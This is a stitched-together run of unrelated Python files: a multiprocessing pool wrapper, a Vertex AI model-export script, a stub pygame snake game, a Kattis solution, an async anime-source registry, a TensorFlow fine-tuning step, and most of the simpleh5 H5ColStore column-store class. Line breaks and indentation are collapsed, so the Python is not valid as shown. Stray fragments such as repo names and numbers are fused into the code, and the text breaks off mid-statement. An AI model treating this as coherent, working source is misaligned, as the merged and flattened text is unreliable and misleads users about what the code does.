multiprocessing.Pool :param list tasks: a list of tasks. 
Each task is defined as a tuple :param int cores: number of cores to be used when multiprocessing :param int chunksize: chunksize of tasks to be send each time for a given process """ def __init__(self, tasks: list, cores: int, chunksize: int): self.tasks = tasks self._cores = cores self._chunksize = chunksize self.pool = None @classmethod def create_tasks(cls, task: Callable, data: [Any], *args, n_cores=None): chunks = MPPoolWrapper.create_chunks(data, n_cores=n_cores) tasks = [(task, chunk, *args) for chunk in chunks] return MPPoolWrapper(tasks, n_cores, len(chunks[0])) @property def cores(self): if self._cores is None: return cpu_count() return self._cores @property def chunksize(self): return self._chunksize @staticmethod def compute_chunksize(data_len: int, n_cores=None) -> int: if n_cores is None: n_cores = cpu_count() chunksize, extra = divmod(data_len, n_cores * 4) if extra: chunksize += 1 return chunksize @staticmethod def create_chunks(data: [Any], n_cores=None) -> [Any]: chunksize = MPPoolWrapper.compute_chunksize(len(data), n_cores=n_cores) chunks = [] for i in range(0, len(data), chunksize): chunks.append(data[i: i + chunksize]) return chunks def __getstate__(self): self_dict = self.__dict__.copy() del self_dict['pool'] return self_dict def __setstate__(self, state): self.__dict__.update(state) @staticmethod def _runstar(args) -> list: return args[0](*args[1:len(args)]) def run(self) -> list: """ Run tasks :return: a list containing the resulting stuff of tasks """ freeze_support() self.pool = Pool(self.cores) results = list(self.pool.imap(self._runstar, self.tasks)) self.pool.close() return [r for res in results for r in res] # Copyright (c) 2020-2021 The MMSegmentation Authors # SPDX-License-Identifier: Apache-2.0 # # Copyright (C) 2021 Intel Corporation # SPDX-License-Identifier: Apache-2.0 # from .base_pixel_sampler import BasePixelSampler from .ohem_pixel_sampler import OHEMPixelSampler from .class_weighting_pixel_sampler import ClassWeightingPixelSampler from .max_pooling_pixel_sampler import MaxPoolingPixelSampler __all__ = [ 'BasePixelSampler', 'OHEMPixelSampler', 'ClassWeightingPixelSampler', 'MaxPoolingPixelSampler', ] 0 import argparse from google.cloud import aiplatform def parse_arguments(parser): """Parses command line arguments. Args: parser: instance of `argparse.ArgumentParser`. """ parser.add_argument( "--project", help="GCP project to deploy model to.", type=str, required=True ) parser.add_argument( "--region", help="Region to deploy model in.", type=str, default="us-central1" ) parser.add_argument( "--model_display_name", help="Name of model to export.", type=str, default="" ) parser.add_argument( "--model_id", help="Model ID to export.", type=str, default="" ) parser.add_argument( "--export_format_id", help="Type of export format.", type=str, choices=[ "tflite", "edgetpu-tflite", "tf-saved-model", "tf-js", "core-ml", "custom-trained" ], default="custom-trained" ) parser.add_argument( "--destination_type", help="Whether model should be exported as an artifact to GCS or an image to GCR.", type=str, choices=["gcs", "gcr"], default="gcs" ) parser.add_argument( "--destination_path", help="GCS or GCR path where to export model artifact or image.", type=str, required=True ) def parse_command_line_arguments(): """Parses command line arguments and returns dictionary. Returns: Dictionary containing command line arguments. """ parser = argparse.ArgumentParser() # Add arguments to parser. parse_arguments(parser) # Parse all arguments. 
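# Example invocation (illustrative; the script file name is an assumption, the
# flags are those defined in parse_arguments() above):
#   python export_model.py --project my-gcp-project \
#       --model_display_name my-model \
#       --export_format_id custom-trained \
#       --destination_type gcs \
#       --destination_path gs://my-bucket/exports/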
args = parser.parse_args() arguments = args.__dict__ return arguments def export_model(arguments): # Initialize. aiplatform.init( project=arguments["project"], location=arguments["region"] ) # Get model ID. model_id = arguments["model_id"] if not model_id: model_display_name = arguments["model_display_name"] model_name_match = aiplatform.Model.list( filter="display_name={}".format(model_display_name) ) if not model_name_match: print( "Model with name {} does NOT exist!".format( model_display_name ) ) return else: model_id = model_name_match[0].name.split("/")[-1] print("Model ID = {}".format(model_id)) # Fetch Model object. model = aiplatform.Model(model_name=model_id) # Finally export model. if arguments["destination_type"] == "gcs": response = model.export_model( export_format_id=arguments["export_format_id"], artifact_destination=arguments["destination_path"] ) else: response = model.export_model( export_format_id=arguments["export_format_id"], image_destination=arguments["destination_path"] ) print("Model export response = {}".format(response)) if __name__ == "__main__": arguments = parse_command_line_arguments() export_model(arguments) Projects/snaketemp.py import pygame import time import random pygame.init() #Colors white = (255, 255, 255) yellow = (255, 255, 102) black = (0, 0, 0) red = (213, 50, 80) green = (0, 255, 0) blue = (50, 153, 213) #PyGame Frame Size dis_width = 600 dis_height = 400 #Header dis = pygame.display.set_mode((dis_width, dis_height)) pygame.display.set_caption('Snake Game') #Creates Game Clock clock = pygame.time.Clock() snake_block = 10 snake_speed = 15 #Sets Font Size font_style = pygame.font.SysFont("bahnschrift", 25) score_font = pygame.font.SysFont("comicsansms", 35) #Score Keeper def Your_score(score): print() #Drawing of Snake def our_snake(snake_block, snake_list): print() #Message printer def message(msg, color): mesg = font_style.render(msg, True, color) dis.blit(mesg, [dis_width / 6, dis_height / 3]) #Loop to keep running the game def gameLoop(): #Game Loop Here print() #Runs loop Over and Over gameLoop()# https://open.kattis.com/problems/includescoring # first input: number of contestants num_c = int(input()) all_c = [] for i in range(num_c): all_c.append(list(map(int,input().split()))) all_c[i].append(i) #store initial index #list values: [0=solutions, 1=penalty, 2=end-time, 3=on-site, 4=original input index, 5=points earned] #sort the list by the various keys/orders all_c = sorted(sorted(sorted(all_c, key = lambda x:x[2]), key = lambda x:x[1]), key = lambda x:x[0], reverse = True) #generate scores points = [100,75,60,50,45,40,36,32,29,26,24,22,20,18,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1] for i in range(len(all_c)): try: all_c[i].append(points[i]) except: all_c[i].append(0) #check for ties, update scores sum = 0 tied = [] for i in range(num_c-1): if all_c[i][5] == all_c[i+1][5]: tied.append(i) else: for x in tied: all_c[x][5] = sum//len(tied) sum = 0 tied = [] #catch for last iteration of previous for loop if len(tied) > 0: tied.append(num_c-1) for x in tied: all_c[x][5] = sum//len(tied) #sort back to original sort all_c = sorted(all_c, key = lambda x:x[4]) #add point for on-site or not, and print for i in range(num_c): all_c[i][5] += all_c[i][3] print(all_c[i][5]) grobber/sources/__init__.py1-10 import asyncio import importlib import logging from typing import Any, AsyncIterator, Dict, List, Optional, Set, Type from ..exceptions import UIDUnknown from ..languages import Language from ..locals import anime_collection from ..models import Anime, 
SearchResult, UID from ..utils import anext log = logging.getLogger(__name__) _SOURCES = ["gogoanime", "masteranime"] SOURCES: Dict[str, Type[Anime]] = {} def register_source(anime: Type[Anime]): SOURCES[f"{anime.__module__}.{anime.__qualname__}"] = anime def _load_sources(): for SRC in _SOURCES: importlib.import_module("." + SRC, __name__) _load_sources() log.info(f"Using Sources: {', '.join(source.__name__ for source in SOURCES.values())}") CACHE: Set[Anime] = set() async def save_dirty() -> None: if not CACHE: return num_saved = 0 coros = [] for anime in CACHE: if anime.dirty: num_saved += 1 coro = anime_collection.update_one({"_id": await anime.uid}, {"$set": anime.state}, upsert=True) coros.append(coro) await asyncio.gather(*coros) log.debug(f"Saved {num_saved} dirty out of {len(CACHE)} cached anime") CACHE.clear() async def delete_anime(uid: str) -> None: log.info(f"deleting anime {uid}...") await anime_collection.delete_one(dict(_id=uid)) async def build_anime_from_doc(uid: str, doc: Dict[str, Any]) -> Anime: try: cls = SOURCES[doc["cls"]] except KeyError: log.warning(f"couldn't find source for {uid}: {doc['cls']}") await delete_anime(uid) raise UIDUnknown(uid) anime = cls.from_state(doc) CACHE.add(anime) return anime async def get_anime(uid: UID) -> Optional[Anime]: doc = await anime_collection.find_one(uid) if doc: return await build_anime_from_doc(uid, doc) return None async def get_anime_by_title(title: str, *, language=Language.ENGLISH, dubbed=False) -> Optional[Anime]: doc = await anime_collection.find_one({"title": title, f"language{Anime._SPECIAL_MARKER}": language.value, "is_dub": dubbed}) if doc: return await build_anime_from_doc(doc["_id"], doc) return None async def search_anime(query: str, *, language=Language.ENGLISH, dubbed=False) -> AsyncIterator[SearchResult]: sources: List[AsyncIterator[SearchResult]] = [source.search(query, language=language, dubbed=dubbed) for source in SOURCES.values()] def waiter(src): async def wrapped(): try: res = await anext(src) except Exception as e: res = e return res, src return asyncio.ensure_future(wrapped()) waiting_sources = {waiter(source) for source in sources} while waiting_sources: done: asyncio.Future (done, *_), waiting_sources = await asyncio.wait(waiting_sources, return_when=asyncio.FIRST_COMPLETED) result, source = done.result() if isinstance(result, StopAsyncIteration): log.debug(f"{source} exhausted") elif isinstance(result, Exception): log.exception(f"{source} failed to yield a search result!") else: waiting_sources.add(waiter(source)) CACHE.add(result.anime) yield result """ References: * https://github.com/facebookresearch/suncet/blob/master/src/snn_fine_tune.py """ from . import losses import tensorflow as tf suncet_loss = losses.get_suncet_loss() def train_step(sup_loader, encoder: tf.keras.Model): """ One step of fine-tuning after PAWS pre-training. 
:param sup_loader: data loader for the labeled support set :param encoder: trunk with projection head (with batchnorm layers frozen) :return: loss and gradients """ # Unpack the data images, labels = sup_loader with tf.GradientTape() as tape: # Forward pass (z: projection output) _, z = encoder(images) loss = suncet_loss(z, labels) # Compute gradients gradients = tape.gradient(loss, encoder.trainable_variables) return loss, gradients 1-10 #!/usr/bin/env python3 from sys import argv from collections import defaultdict, Counter, deque from re import match, search from math import ceil filename = argv[1] if len(argv) > 1 else '0.in' cases = [] with open(filename) as fp: for i, line in enumerate(fp): line = line.strip() cases.append([int(n) for n in line.split(' ')]) def solve(b, a): return ceil((2*a)/b) for case in cases: print(solve(*case))ssolari/simpleh5 """ H5ColStore is the top-level object to use to write and read tabular column stores. The H5ColStore object is passed a string representing the full file path to the desired .h5(hdf5) file. Instantiating the object is harmless, all future operations will operate on this .h5 file. Example:: my_column_store = H5ColStore('all_tables.h5') The goal of H5ColStore is to create a simplified experience with high performance for data scientists to focus on analytics at the trade off of 'optimal' performance. Time and effort are a trade off and H5ColStore tries to enable a focus on using data in an efficient manner rather than providing hooks into all parameterization of how a file can be stored and what compressors are used. """ from datetime import datetime import logging import numpy as np import os import re import tables as tb import traceback from typing import Optional, Union import uuid from simpleh5.utilities.search_utilities import _filter_inds from simpleh5.utilities.serialize_utilities import msgpack_dumps, msgpack_loads ATTR_COLDTYPE = 'col_dtype' ATTR_COLFLAV = 'col_flavor' ATTR_NROWS = 'num_rows' ATTR_CTABLE = '_ctable_attrs' with open(os.path.join(os.path.dirname(__file__), '..', 'VERSION')) as fd: VERSION = fd.read().strip() class H5ColStore(object): def __init__(self, h5file: str): if not re.search('\.h5$', h5file): raise Exception(f'h5file should have a .h5 extension') # path to the .h5 file that will be operated on self._h5file = h5file # default all operations to be blosc filter with highest comp level self._filters = tb.Filters(complevel=9, complib='blosc', fletcher32=False) def __str__(self): with self.open(mode='r') as h5: return h5.__str__() def exists(self): return os.path.exists(self._h5file) def open(self, mode: str='a') -> tb.File: """ Open the file and return file handle to use with methods requiring open file handle. Should be used as:: colstore = SimpaHdf5(filename) with colstore.open(mode='a') as h5: colstore.fh_somemethod(h5, ...) :param mode: open mode in ['r', 'r+', 'a', 'w'] (default='a') :return: """ if mode == 'a' or mode == 'w': try: fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) except IOError: os.makedirs(os.path.dirname(self._h5file), exist_ok=True) fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) else: fh = tb.open_file(self._h5file, mode=mode, filters=self._filters) return fh def create_ctable(self, table_name: str, col_dtypes: dict, col_shapes: Optional[dict]=None, expectedrows: int=10000) -> None: """ Create a new coltable under table path. 
Note that all data is compressed therefore unknown length strings can be hedged by using a large number and allowing compression to save space. Even with S1000 a string 'a' will take up a much smaller amount of space due to compression. Same with compressed objects which are actually compressed twice to maximize ability to not overflow specified length in unknown cases. :param table_name: name of columnar table :param col_dtypes: dictionary of (column-name -> dtype) arguments. Dtype(str) should be one of: * 'i': 64-bit integer * 'f': 64-bit float * 'n': 64-bit float * 'sx': len x string (unicode will be converted to utf-8 so length applies to final utf-8 strings) * 'ox': len x object (objects are serialized via msgpack so len refers to final serialized bytes len +1) * 'cx': len x compressed object (msgpack obj is compressed so len refers to final compressed len) Note small objects when compressed can increase in size. :param col_shapes: (optional) dictionary of shapes for each column. Should have the form (0,) or (0, x). Mostly used when a 2-d array will be a column. Not needed if a column is 1 dimension i.e. (0,). Note the first entry is 0 if creating an empty table and appending data. :param expectedrows: (optional, default=10000) determines chunk size, if number of rows will be very large, then good to specify to optimize chunking. :return: Example table creation from definition:: h = SimpaHdf5('myfile.h5') # define table col_dtype = { 'col1': 'i' # integers 'col2': 's3' # len 3 strings (after utf-8 conversion) 'col3': 'o100' # uncompressed serialized objects with final byte len 100 'col4': 'f' # floats 'col5': 'c200' # compressed serialized objects with final byte len 200 } h.create_table('table1', col_dtype) """ if col_shapes is None: col_shapes = {} with self.open(mode='a') as h5: self._create_ctable(h5, table_name, col_dtypes, col_shapes, expectedrows=expectedrows) def _create_ctable(self, h5, table_path, col_dtype, col_shapes, expectedrows: int=10000): # convert all dtypes to lowercase for col in col_dtype: col_dtype[col] = col_dtype[col].lower() for col_name, dtype in col_dtype.items(): self._create_column_from_dtype(h5, table_path, col_name, dtype, col_shapes.get(col_name, None), expectedrows=expectedrows) self._write_attrs(h5, table_path, ATTR_COLDTYPE, col_dtype) def delete_ctable(self, table_name: str, raise_exception=False) -> None: """ Delete the table if it exists. Note that this will not reduce the size of the file. A repack is needed to reduce file size after data deletion. :param table_name: path to table :param raise_exception: raise an exception if the table doesn't exist. If False and the table does not exist the method will simply return. :return: """ nodepath = self._norm_path(table_name) with self.open(mode='a') as h5: if raise_exception: h5.remove_node(nodepath, recursive=True) else: try: h5.remove_node(nodepath, recursive=True) except: pass def add_column(self, table_path: str, col_name: str, col_data: (list, tuple, np.ndarray)=None, col_dtype: str=None, shape=(0,)): """ Add a column of data to an existing table. The length of the data must be the same length as the existing table. The addition of a column is a cheap operation since data is stored by column. 
:param table_path: internal path to table :param col_name: name of new column :param col_data: data for new column :param col_dtype: optional data type :param shape: shape of column if different than (0,) :return: """ if col_data is None: raise NotImplementedError(f'Default back filling is coming soon...') with self.open(mode='a') as h5: table_info = self._table_info(h5, table_path) if len(table_info) == 0: raise Exception(f'Addcol needs an existing table at {table_path} in {self._h5file}') if table_info[ATTR_NROWS] != len(col_data): raise Exception(f'New column data different length ({len(col_data)}) ' f'than table ({table_info[ATTR_NROWS]}) in {self._h5file}') if col_dtype: self._create_column_from_dtype(h5, table_path, col_name, col_dtype, shape) self._add_column(h5, table_path, col_name, col_data, col_dtype, True) else: col_dtype = self._create_column_from_data(h5, table_path, col_name, col_data) # set the datatype coldt = table_info[ATTR_COLDTYPE] coldt[col_name] = col_dtype self._write_attrs(h5, table_path, ATTR_COLDTYPE, coldt) # set the flavor colflavor = table_info[ATTR_COLFLAV] if isinstance(col_data, np.ndarray): colflavor[col_name] = 'numpy' else: colflavor[col_name] = 'python' self._write_attrs(h5, table_path, ATTR_COLFLAV, colflavor) def _add_column(self, h5: tb.File, table_name: str, column_name: str, data: list, dtype: str, resize: bool): data = self._convert_data(data, dtype) colpath = self._path(table_name, column_name) if re.match(r'[osc](\d+)', dtype): colnode = self._safe_col_str_change(h5, colpath, dtype, data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode.append(data) def delete_column(self, table_name: str, col_name: str, raise_exception=False) -> None: """ Delete a single column from a table. :param table_name: table path :param col_name: name of column :param raise_exception: ignore exceptions when trying to delete colom (like for a non-existant column) :return: """ colpath = self._path(table_name, col_name) with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_name) if not simpah5_attrs and raise_exception: raise Exception(f"Table doesn't exist: {table_name} in {self._h5file}") elif col_name not in simpah5_attrs[ATTR_COLDTYPE] and raise_exception: raise Exception(f"Column doesn't exist: {table_name}/{col_name} in {self._h5file}") if raise_exception: h5.remove_node(colpath) del simpah5_attrs[ATTR_COLDTYPE][col_name] del simpah5_attrs[ATTR_COLFLAV][col_name] else: try: h5.remove_node(colpath) del simpah5_attrs[ATTR_COLDTYPE][col_name] del simpah5_attrs[ATTR_COLFLAV][col_name] except: pass if simpah5_attrs: self._write_attrs(h5, table_name, ATTR_COLDTYPE, simpah5_attrs[ATTR_COLDTYPE]) self._write_attrs(h5, table_name, ATTR_COLFLAV, simpah5_attrs[ATTR_COLFLAV]) def append_ctable(self, table_name: str, col_data: dict, col_dtypes: Optional[dict]=None, resize: bool=True) -> None: """ Append data to all columns in table. Data for columns must all be the same length and all columns must be specified. See also :meth:`.create_ctable` for table data types and creating tables. If the table does not exist it will be created with the datatypes defined by the data. Consider creating the table first with predefined data types, or specifying the col_dtypes attribute, which will set the datatypes for the table on the first write only. 
On the first append of any data the flavor (python or numpy) of each data column is inspected (from the first element) and the flavor correspondingly stored with the table. On subsequent reads of the data the stored flavor (list or ndarray) of data will be returned. If the data is passed as a numpy ndarray then the data will be returned as a ndarray if passed as a list then data will be returned as a python list. 'o' or 'c' datatypes always have the flavor of a python list. :param table_name: name of table to write :param col_data: dictionary of {'column_name': [data1, data2, ...], ...} :param col_dtypes: dictionary of {'column_name': dtype1, ...}. col_dtypes is only used if table does not exist on first append and will make call to :meth:`.create_ctable`. :param resize: Applies to string columns [s, o, c]. (default=True). If True, prevents possibility of overflowing string or object out of defined column size. In the case that a string object is too large, the entire column is rewritten to the size of the largest string in the newly appended data. Note, this can be expensive! The entire column is read into memory before rewriting. If False an exception will be raised if any data is longer than the existing size. :return: None Example data:: h = SimpaHdf5('myfile.h5') col_data = { 'col1': [1, 2, 3], 'col2': ['abc', 'def', 'geh'], 'col3': [ {'this is a dict': 123}, {'a': 2, 'hello': 'world'}, ['this is a list'] ], 'col4': np.array([1.2, 3.4, 5.6]) } Create then append data:: # define table col_dtype = { 'col1': 'i', # integers 'col2': 's5', # len 3 strings (after utf-8 conversion) 'col3': 'o100', # uncompressed objects with final byte len 100 'col4': 'f' # floats } h.create_ctable('mytable_1', col_dtype) h.append_ctable('mytable_1', col_data) mytable_1 will have the following dtype:: info = h.table_info('mytable_2') print(info) # {'col_dtype': {'col1': 'i', 'col2': 's5', 'col3': 'o100', 'col4': 'f'}, # 'col_flavor': {'col1': 'python', 'col2': 'python', 'col3': 'python', 'col4': 'numpy'}, # 'num_rows': 3} OR create from data alone:: h.append_ctable('mytable_2', col_data) mytable_2 will have the following dtype:: info = h.table_info('mytable_2') print(info) # {'col_dtype': {'col1': 'i', 'col2': 's3', 'col3': 'o18', 'col4': 'f'}, # 'col_flavor': {'col1': 'python', 'col2': 'python', 'col3': 'python', 'col4': 'numpy'}, # 'num_rows': 3} """ if col_dtypes is None: col_dtypes = {} with self.open(mode='a') as h5: self._append_ctable(h5, table_name, col_data, resize=resize, col_dtypes=col_dtypes) def update_ctable(self, table_name: str, query: Union[list, tuple], col_data: dict, resize: bool=True) -> None: """ Perform an update of data in an existing table. :param table_name: table to update :param query: (required) match criteria to define rows to update :param col_data: (required) data to replace in each column. Only columns and data in col_data will be updated. col_data should either contain lists of length 1 (all found rows will be updated with this information), or the exact same length as the number of indices found. If data is presented with len > 1 and a mismatch occurs with the length of the indices that are returned from the match, an Exception will be raised. :param resize: True (default) prevents possibility of overflowing object or string columns. In the case that an object is too large the entire column is rewritten to the size of the largest string in the new append. Note the entire column is read into memory before rewriting. 
If False an exception will be raised, but other columns may have been written. :return: """ if not query: raise Exception(f"A query is required for update_ctable in {self._h5file}") # error checking assert len(col_data) > 0 change_len = None for col in col_data: if change_len is None: change_len = len(col_data[col]) elif change_len != len(col_data[col]): raise Exception(f"Column data specified is not the same length col {col} = {len(col_data[col])} " f"in {self._h5file}") with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_name) col_dtype = simpah5_attrs[ATTR_COLDTYPE] # return a dictionary of node name to node pointers node_data = h5.get_node(self._norm_path(table_name))._v_children inds = _filter_inds(node_data, query) inds = np.nonzero(inds)[0] # check that inds match column change length if change_len != 1 and change_len != len(inds): raise Exception(f"Update column length different than rows length found in match in {self._h5file}") for col, data in col_data.items(): if col not in col_dtype: logging.warning(f"Column {col} specified for updating, " f"but not found in table {table_name}...ignoring") data = self._convert_data(col_data[col], col_dtype[col]) colpath = self._path(table_name, col) if re.match(r'[osc](\d+)', col_dtype[col]): colnode = self._safe_col_str_change(h5, colpath, col_dtype[col], data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode[inds] = data def read_ctable(self, table_name: str, cols: Optional[list]=None, query: Union[list, tuple]=(), inds: Union[list, tuple]=(), flavor: str='') -> dict: """ Read data from the table and return a dictionary of columns. Data is returned in the flavor it was stored in. Search capability exists through query parameter. Both old style and new style work (see below). Example read:: h = SimpaHdf5('myfile.h5') data = h.read_ctable('table1', cols=['col2', 'col4']) # return data will look like data = { 'col2': [c2_val1, c2_val2, ...], 'col4': [c4_val1, c4_val2, ...] } query can filter datavalues across all columns even if they are not returned. A query has the format:: # (col1 > 1.2) & (col1 < 2.3) & (col2 == 'abc') query = [ ('col1', '>', 1.2), ('col1', '<', 2.3), ('col2', '==', 'abc') ] # col1 == 1.2 query = ('col1', '==', 1.2) # NOTE: in the case of a single condition as above the additional surrounding list is not needed. # (col1 > 1.2) & (col1 < 2.3) & ((col2 == 'abc') | (col2 == 'def') | (col3 == True)) & (col2 != 'ggg') query = [ ('col1', '>', 1.2), ('col1', '<', 2.3), (('col2', '==', 'abc'), ('col2', '==', 'def'), ('col3', '==', True)), ('col2', '!=', 'ggg') ] Where each column condition in query list are logical & ('and') together. Sub-conditions within a single query column name are logical | ('or') together. :param table_name: path to table :param cols: return only this list of columns :param query: see description above :param inds: a list of indices to pull, will override any query :param flavor: ['python', 'numpy'], if set will force columns to be returned as either lists(python) or numpy arrays (numpy). Columns specified as objects 'o' or compressed objects 'c' ignore flavor. Returning numpy arrays can be slightly faster. 
:return: return a dictionary of column name to list/array values """ return_data = None col_dtype = None with self.open(mode='r') as h5: simpah5_attrs = self._read_attrs(h5, table_name) if len(simpah5_attrs) == 0: raise Exception(f"{table_name} doesn't exist in {self._h5file}") col_dtype = simpah5_attrs[ATTR_COLDTYPE] # determine columns to return return_cols = set(col_dtype.keys()) if cols: return_cols = return_cols.intersection(set(cols)) if query and not inds: allcols = h5.get_node(self._norm_path(table_name))._v_children inds = _filter_inds(allcols, query) # get data off disk return_data = {} for col in return_cols: node = self._get_col(h5, self._path(table_name, col)) if len(inds) == 0: # read in all node data return_data[col] = node.read() else: if len(node.shape) == 2: return_data[col] = node[np.array(inds), :] else: return_data[col] = node[np.array(inds)] # convert data to correct format. filehandle doesn't need to be open, so do here to get data off disk first for col in return_data.keys(): dtype = col_dtype[col] if re.match(r'o', dtype): return_data[col] = [msgpack_loads(x, compress=False) for x in return_data[col]] elif re.match(r'c', dtype): return_data[col] = [msgpack_loads(x, compress=True) for x in return_data[col]] else: if re.match(r's', dtype): return_data[col] = np.core.defchararray.decode(return_data[col], 'utf-8') else: return_data[col] = return_data[col] if flavor and flavor == 'numpy': pass elif flavor and flavor == 'python' and isinstance(return_data[col], np.ndarray): return_data[col] = return_data[col].tolist() elif ATTR_COLFLAV in simpah5_attrs and \ simpah5_attrs[ATTR_COLFLAV][col] == 'python' and isinstance(return_data[col], np.ndarray): return_data[col] = return_data[col].tolist() elif ATTR_COLFLAV not in simpah5_attrs and isinstance(return_data[col], np.ndarray): # default to python return_data[col] = return_data[col].tolist() return return_data def iter_column(self, table_name: str, col: str, flavor: str=''): """ Iterate through all values of a single column in table. 
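A minimal usage sketch (table and column names are illustrative)::

    h = SimpaHdf5('myfile.h5')
    for value in h.iter_column('mytable_1', 'col2'):
        # 's' columns yield decoded strings; 'o'/'c' columns yield deserialized objects
        print(value)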
:param table_name: :param col: :return: """ with self.open(mode='r') as h5: simpah5_attrs = self._table_info(h5, table_name) if len(simpah5_attrs) == 0: raise Exception(f"{table_name} doesn't exist in {self._h5file}") col_dtype = simpah5_attrs[ATTR_COLDTYPE] nrows = simpah5_attrs[ATTR_NROWS] return_cols = set(col_dtype.keys()) if col not in return_cols: raise Exception(f'Specified column {col} not in {table_name} columns {list(return_cols)}') dtype = col_dtype[col] colflavor = simpah5_attrs[ATTR_COLFLAV][col] colnode = self._get_col(h5, self._path(table_name, col)) for row in colnode.iterrows(): if dtype[0] == 's': yield row.decode('utf-8') elif dtype[0] == 'o': yield msgpack_loads(row, compress=False) elif dtype[0] == 'c': yield msgpack_loads(row, compress=True) elif flavor and flavor == 'numpy': yield row elif dtype[0] == 'f' or dtype[0] == 'n' and colflavor == 'python': yield float(row) elif dtype[0] == 'i' and colflavor == 'python': yield int(row) else: yield row def _append_ctable(self, h5, table_path: str, col_data: dict, resize: bool=True, col_dtypes: Optional[dict]=None): if col_dtypes is None: col_dtypes = {} # ensure all lengths are equal error check data_lengths = [len(d) for d in col_data.values()] last_len = data_lengths[0] for klen in data_lengths: if last_len != klen: raise Exception(f"column lengths are not equal on append: {last_len} vs {klen}") simpah5_attrs = self._read_attrs(h5, table_path) # need to create table as it does not exist if len(simpah5_attrs) == 0: if col_dtypes: # compute shapes shapes = {} for col, data in col_data.items(): sp = (0,) if isinstance(data, np.ndarray) and len(data.shape) > 1: sp = list(data.shape) sp[0] = 0 shapes[col] = sp self._create_ctable(h5, table_path, col_dtypes, shapes) simpah5_attrs = self._read_attrs(h5, table_path) else: coldt = {} for col, data in col_data.items(): dtype = self._create_column_from_data(h5, table_path, col, data) coldt[col] = dtype # write table attributes self._write_attrs(h5, table_path, ATTR_COLDTYPE, coldt) _ = self._set_flavor(h5, table_path, col_data, coldt) return coldt = simpah5_attrs[ATTR_COLDTYPE] if len(set(coldt.keys()).difference(set(col_data.keys()))) > 0: raise Exception(f"Not all columns specified in col_data for append to {table_path}. " f"dtypes={set(coldt.keys())} ... 
col_data={set(col_data.keys())} in {self._h5file}") # check and set the column flavor once if ATTR_COLFLAV not in simpah5_attrs: simpah5_attrs[ATTR_COLFLAV] = self._set_flavor(h5, table_path, col_data, coldt) prev_nrows = self._table_info(h5, table_path)[ATTR_NROWS] restore = False error_msg = '' for col, coldtype in coldt.items(): try: data = self._convert_data(col_data[col], coldtype) colpath = self._path(table_path, col) if re.match(r'[osc](\d+)', coldtype): colnode = self._safe_col_str_change(h5, colpath, coldtype, data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode.append(data) except: restore = True error_msg = traceback.format_exc() break if restore: # loop through all column nodes and ensure they have the same previous length to restore for col, coldtype in coldt.items(): col_path = self._path(table_path, col) node = self._get_col(h5, col_path) cur_rows = int(node.shape[0]) if cur_rows > prev_nrows: inds = list(range(prev_nrows, cur_rows)) node = self._get_col(h5, col_path) self._remove_array_rows(node, inds) raise Exception(error_msg) @staticmethod def _convert_data(data: (list, tuple), coldtype: str): if re.match(r'c', coldtype): data = [msgpack_dumps(x, compress=True) for x in data] elif re.match(r'o', coldtype): data = [msgpack_dumps(x, compress=False) for x in data] data = np.array(data) if re.search(r'U', str(data.dtype)): data = np.core.defchararray.encode(data, 'utf-8') assert isinstance(data, (list, tuple, np.ndarray)) return data def _path(self, colpath: str, colname: str) -> str: return self._norm_path(colpath, colname=colname) def _get_col(self, h5: tb.File, nodepath: str) -> tb.EArray: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except KeyError: node = None return node def _get_node(self, h5: tb.File, nodepath: str) -> tb.Leaf: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except KeyError: node = None return node @staticmethod def _norm_path(colpath: str, colname: str = '') -> str: if not colpath: colpath = '/' if colpath == '/': name = [] else: name = [''] cst = 0 cend = len(colpath) if colpath[0] == '/': cst = 1 if colpath[-1] == '/': cend = cend - 1 name.append(colpath[cst:cend]) if colname: nst = 0 nend = len(colname) if colname[0] == '/': nst = 1 if colname[-1] == '/': nend = nend - 1 name.append(colname[nst:nend]) return '/'.join(name) def _exists_node(self, h5: tb.File, nodepath: str) -> tb.Leaf: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except tb.NoSuchNodeError: node = None return node def _write_attrs(self, h5, table_path, attrs_name, attrs_value): table = self._get_node(h5, table_path) try: attr_bytes = table._v_attrs[ATTR_CTABLE] simpah5_attrs = msgpack_loads(attr_bytes, use_list=True) except KeyError: simpah5_attrs = {} simpah5_attrs['_version'] = VERSION simpah5_attrs[attrs_name] = attrs_value table._v_attrs[ATTR_CTABLE] = msgpack_dumps(simpah5_attrs) def _read_attrs(self, h5, table_path: str) -> dict: try: node = self._get_node(h5, table_path) except tb.NoSuchNodeError: return {} if ATTR_CTABLE not in node._v_attrs: return {} simpah5_attrs = msgpack_loads(node._v_attrs[ATTR_CTABLE], use_list=True) return simpah5_attrs def _set_flavor(self, h5: tb.File, table_path: str, col_data: dict, col_dtypes: dict) -> dict: # set column flavors colflavor = {} for col, dtype in col_dtypes.items(): if isinstance(col_data[col], (list, tuple)): colflavor[col] = 'python' else: 
colflavor[col] = 'numpy' self._write_attrs(h5, table_path, ATTR_COLFLAV, colflavor) return colflavor def _create_column(self, h5: tb.File, colpath: str, atom: Optional[tb.Atom]=None, expectedrows: int=10000, shape: Optional[tuple]=None, data: (list, tuple, np.ndarray)=None) -> tb.EArray: # create an EArray column and return the created node if data is None and shape is None: shape = (0,) if data is not None and not isinstance(data, np.ndarray) and isinstance(data[0], str): data = [x.encode('utf-8') for x in data] return h5.create_earray( os.path.dirname(colpath), os.path.basename(colpath), obj=data, createparents=True, atom=atom, shape=shape, expectedrows=expectedrows, filters=self._filters ) def _create_column_from_dtype(self, h5: tb.File, table_path: str, col_name: str, col_dtype: str, shape: tuple, expectedrows: int=10000): colpath = self._path(table_path, col_name) if re.match(r'[nf]', col_dtype): self._create_column(h5, colpath, atom=tb.Float64Atom(), shape=shape, expectedrows=expectedrows) elif re.match(r'i', col_dtype): self._create_column(h5, colpath, atom=tb.Int64Atom(), shape=shape, expectedrows=expectedrows) elif 